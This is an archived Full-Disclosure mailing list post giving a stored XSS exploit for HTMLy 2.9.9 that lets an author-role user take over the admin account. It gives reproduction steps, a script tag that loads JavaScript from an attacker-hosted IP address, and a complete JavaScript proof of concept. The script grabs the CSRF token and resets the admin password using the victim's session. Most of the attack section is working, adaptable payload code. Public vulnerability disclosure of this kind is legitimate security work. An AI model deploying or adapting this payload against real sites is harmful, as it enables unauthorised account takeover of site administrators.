lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAF2Wu1ay4xftOB0dZsWWxd-yZwg_T5e9v=Ux9Q=ULwzJyGZv1A@mail.gmail.com>
Date: Mon, 16 Sep 2024 17:16:14 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Stored XSS to Account Takeover - htmlyv2.9.9

# Exploit Title: Stored XSS to Account Takeover - htmlyv2.9.9
# Date: 9/2024
# Exploit Author: Andrey Stoykov
# Version: 2.9.9
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/08/friday-fun-pentest-series-9-stored-xss.html


Description:

- It was found that the application suffers from stored XSS

- Low level user having an "author" role can takeover admin account and
change their password via posting a malicious post with a reference to a
payload hosted on attacker domain



Stored XSS to Account Takeover #1:

Steps to Reproduce:

1. Visit "My Posts" > "Add New Post" > "Regular Post"
2. Enter the following payload into the "Content" referencing externally
hosted POC in Javascript:
 <script src="http://192.168.159.191:8000/xss.js"></script>
3. Upon visiting the blog post, the admin account password would be changed
to "test"
4. In the XSS payload pasted below need to adjust the "passwordChangeUrl",
"username" and "password"


// Javascript POC

// Function to fetch CSRF token and perform password change
    (function() {
        // URL of the password change page
        const passwordChangePageUrl = '
http://192.168.159.191/htmly/edit/password';

        // Function to fetch the CSRF token
        function fetchCsrfToken() {
            fetch(passwordChangePageUrl, {
                method: 'GET',
                credentials: 'include' // Include cookies for the current
session
            })
            .then(response => response.text())
            .then(html => {
                // Parse the HTML to find the CSRF token
                const parser = new DOMParser();
                const doc = parser.parseFromString(html, 'text/html');
                const csrfTokenInput =
doc.querySelector('input[name="csrf_token"]');
                if (csrfTokenInput) {
                    const csrfToken = csrfTokenInput.value;
                    console.log('CSRF Token:', csrfToken);
                    changePassword(csrfToken);
                } else {
                    console.error('CSRF token not found');
                }
            })
            .catch(error => console.error('Error fetching CSRF token:',
error));
        }

        // Function to change the password
        function changePassword(csrfToken) {
            const postData = new URLSearchParams();
            postData.append('csrf_token', csrfToken);
            postData.append('username', 'admin');
            postData.append('password', 'test');

            fetch(passwordChangePageUrl, {
                method: 'POST',
                body: postData,
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                credentials: 'include' // Include cookies for the current
session
            })
            .then(response => response.text())
            .then(data => {
                console.log('Password change response:', data);
            })
            .catch(error => console.error('Error changing password:',
error));
        }

        // Trigger the CSRF token fetch and password change
        fetchCsrfToken();
    })();
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ